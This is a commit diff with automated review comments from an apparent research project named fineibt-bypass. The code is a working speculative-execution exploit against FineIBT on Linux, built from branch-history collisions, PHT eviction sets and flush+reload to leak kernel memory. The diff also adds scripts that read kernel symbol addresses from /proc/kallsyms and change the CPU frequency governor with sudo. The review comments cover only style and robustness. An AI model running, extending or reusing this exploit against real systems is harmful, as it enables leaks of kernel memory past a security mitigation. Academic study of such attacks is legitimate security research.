
Commit c29e4dd

[fineibt-bypass] Select PC[6] eviction branch dynamically
1 parent 367032f commit c29e4dd


6 files changed

+23
-15
lines changed


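--- a/experiments/fineibt-bypass/src/colliding_bhb.c
+++ b/experiments/fineibt-bypass/src/colliding_bhb.c
@@ -56,7 +56,7 @@ int find_colliding_history(struct config * cfg, uint8_t do_pht_eviction) {
 if(iter % 20000 == 0) {
 for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
 {
-randomize_branch_locations(cfg->all_pht_cfg[i], 0);
+randomize_branch_locations(cfg->all_pht_cfg[i], cfg->pht_bit_set);
 }
 }
 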

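--- a/experiments/fineibt-bypass/src/evict_pht.c
+++ b/experiments/fineibt-bypass/src/evict_pht.c
@@ -124,6 +124,8 @@ void randomize_branch_locations(pht_config * pht_cfg, uint8_t bit_set) {
 
 // addr_off = ((addr_off + JMP_GADGET_OFFSET) & 0xfffffffffffff000 | 0x00b) - JMP_GADGET_OFFSET;
 
+// Bit 6 of the PC have to be equal for the eviction branches and the
+// branch to be evicted
 if (bit_set) {
 addr_off = ((addr_off + JMP_GADGET_OFFSET) | 0x20) - JMP_GADGET_OFFSET;
 } else {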
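Review bot: The added comment `// Bit 6 of the PC have to be equal ...` is ambiguous about bit numbering: the mask applied on the next line is `0x20`, which is bit 5 when counting from zero and only the sixth bit when counting from one, and main.c labels the same quantity `PC[6]`. Pin the convention so the comment and the literal cannot be read as disagreeing, e.g. `// PC bit 5 (0-indexed, mask 0x20; "PC[6]" in the 1-indexed naming used elsewhere) has to be equal for the eviction branches and the branch to be evicted`, which also fixes the grammar (`have to` → `has to`). The same `0x20` literal is repeated in main.c where `cfg.pht_bit_set` is computed; a single named constant shared through the header would keep the two sites in step. `randomize_branch_locations` starts and ends outside the hunk.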

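--- a/experiments/fineibt-bypass/src/flush_and_reload.h
+++ b/experiments/fineibt-bypass/src/flush_and_reload.h
@@ -51,6 +51,7 @@ struct config {
 
 pht_config * pht_cfg;
 pht_config * all_pht_cfg[NUMBER_OF_EVICT_SETS];
+int pht_bit_set;
 };
 
 void set_load_chain_simple_touch(struct config * cfg, int number_of_loads);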
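Review bot: `int pht_bit_set;` is handed to `randomize_branch_locations(pht_config * pht_cfg, uint8_t bit_set)` (evict_pht.c) from both colliding_bhb.c and main.c, so every call site silently narrows `int` to `uint8_t`; the value computed in main.c is only ever 0 or 1, but declaring the field with the callee's type, `uint8_t pht_bit_set;`, removes the implicit conversion and matches how this code already types such flags (`uint8_t do_pht_eviction`). The field is also undocumented; a one-line comment such as `// PC bit (mask 0x20) of the branch to be evicted, 0 or 1; eviction sets are laid out to match it` would tell a reader why it is set once in main and passed everywhere. `struct config` starts outside the hunk.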

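--- a/experiments/fineibt-bypass/src/main.c
+++ b/experiments/fineibt-bypass/src/main.c
@@ -218,25 +218,25 @@ int main(int argc, char **argv)
 break;
 default:
 printf("Usage:\n"
-"%s -t TARGET_BASE [options]\n"
+"%s -t TARGET_BASE -u UNIX_POLL [options]\n"
 " -t TARGET_BASE target base address (uuid_string)\n"
+" -u UNIX_POLL unix_poll address (required for pht eviction set)\n"
 " -h HISTORY a previous found colliding history\n"
 " -p PHYS_MAP the start of the physical map\n"
 " -f FAST Disable FineIBT check during collision finding\n"
-" -u unix_poll address (required with -f)\n"
 , argv[0]);
 exit(1);
 }
 }
 
-if (target_base == 0) {
+if (target_base == 0 || unix_poll_addr == 0) {
 printf("Usage:\n"
-"%s -t TARGET_BASE [options]\n"
+"%s -t TARGET_BASE -u UNIX_POLL [options]\n"
 " -t TARGET_BASE target base address (uuid_string)\n"
+" -u UNIX_POLL unix_poll address (required for pht eviction set)\n"
 " -h HISTORY a previous found colliding history\n"
 " -p PHYS_MAP the start of the physical map\n"
 " -f FAST Disable FineIBT check during collision finding\n"
-" -u unix_poll address (required with -f)\n"
 , argv[0]);
 exit(1);
 }
@@ -256,11 +256,6 @@ int main(int argc, char **argv)
 
 if (fast_colliding_phase) {
 
-if (unix_poll_addr == 0) {
-printf("Please provide the address of unix_poll (-u)\n");
-exit(EXIT_FAILURE);
-}
-
 if (access(PATH_PATCH_INSERT_CHECK, F_OK) == 0) {
 cfg.fd_insert_check = open(PATH_PATCH_INSERT_CHECK, O_WRONLY);
 assert(cfg.fd_insert_check);
@@ -340,10 +335,14 @@ int main(int argc, char **argv)
 cfg.tfp_leak_target = (uint8_t *) (target_base + TFP_LEAK_TARGET_OFFSET);
 printf(" - TFP_LEAK_TARGET: %p\n", cfg.tfp_leak_target);
 
+// Get 6h bit of the the target branch to be evicted (fine-ibt sid check)
+cfg.pht_bit_set = ((unix_poll_addr - 4) & 0x20) >> 5;
+printf(" - FINE_IBT SID Branch PC[6]: %d\n", cfg.pht_bit_set);
+
 
 for (size_t i = 0; i < NUMBER_OF_EVICT_SETS; i++)
 {
-cfg.all_pht_cfg[i] = init_pht_eviction(0);
+cfg.all_pht_cfg[i] = init_pht_eviction(cfg.pht_bit_set);
 }
 printf(" - Allocated %d PHT eviction sets\n", NUMBER_OF_EVICT_SETS);
 
@@ -463,7 +462,7 @@ int main(int argc, char **argv)
 
 for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
 {
-randomize_branch_locations(cfg.all_pht_cfg[i], 0);
+randomize_branch_locations(cfg.all_pht_cfg[i], cfg.pht_bit_set);
 }
 
 memset(hit_rates, 0, sizeof(hit_rates));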
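Review bot: `cfg.pht_bit_set = ((unix_poll_addr - 4) & 0x20) >> 5;` (third hunk) ties three related magic numbers together with only the comment `Get 6h bit of the the target branch` ("6h" for "6th", doubled "the"), and the `0x20` mask is duplicated in evict_pht.c's `randomize_branch_locations`, so the two can drift apart silently. Give the mask and shift one named origin that both files use, e.g. `#define PHT_PC_BIT_MASK 0x20` and `#define PHT_PC_BIT_SHIFT 5` (constructed names) in the shared header, and let the comment say what `-4` points at relative to `unix_poll_addr`, since nothing in the hunk explains that displacement. The printf label `PC[6]` counts bits from one while the mask selects bit 5 counting from zero; state which convention is meant so the printed value is not misread. Minor, first hunk: the usage text is now maintained in two identical copies that were both edited here; a small `static void usage(const char *prog)` helper would leave one copy. `main` starts and ends outside these hunks.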

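--- a/experiments/fineibt-bypass/src/run.sh
+++ b/experiments/fineibt-bypass/src/run.sh
@@ -13,11 +13,15 @@ if [ $# -eq 1 ]
 PHYS_MAP=$1
 fi
 
+echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
+
 make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
 
 UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`
+echo "uuid_string: ${UUID_STRING}"
 
-echo "uid_string: ${UUID_STRING}"
+UNIX_POLL=`cat /proc/kallsyms | grep -w unix_poll | awk '{print $1}'`
+echo "unix_poll: ${UNIX_POLL}"
 
 
-taskset -c 0 ./main -t $UUID_STRING -p $PHYS_MAP
+taskset -c 0 ./main -t $UUID_STRING -u ${UNIX_POLL} -p $PHYS_MAP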
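Review bot: `UNIX_POLL` is used unchecked: if `/proc/kallsyms` is unreadable or shows zeroed addresses under `kptr_restrict`, the `grep | awk` pipeline yields an empty or all-zero string and `./main` only fails later with the generic usage message, so test the lookup where it happens, `[ -n "$UNIX_POLL" ] || { echo "unix_poll not found in /proc/kallsyms" >&2; exit 1; }` (the existing `UUID_STRING` lookup has the same gap). The new `echo performance | sudo tee .../scaling_governor` line switches the frequency governor of every core system-wide and never restores it; the same line is added in run_fast.sh, and both should either save and restore the previous value or carry a comment saying the change persists after the run. Minor: `$(...)` instead of backticks and quoting `"$UUID_STRING"`/`"$PHYS_MAP"` on the `taskset` line would match current shell practice.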

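--- a/experiments/fineibt-bypass/src/run_fast.sh
+++ b/experiments/fineibt-bypass/src/run_fast.sh
@@ -13,6 +13,8 @@ if [ $# -eq 1 ]
 PHYS_MAP=$1
 fi
 
+echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
+
 make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
 
 UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`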
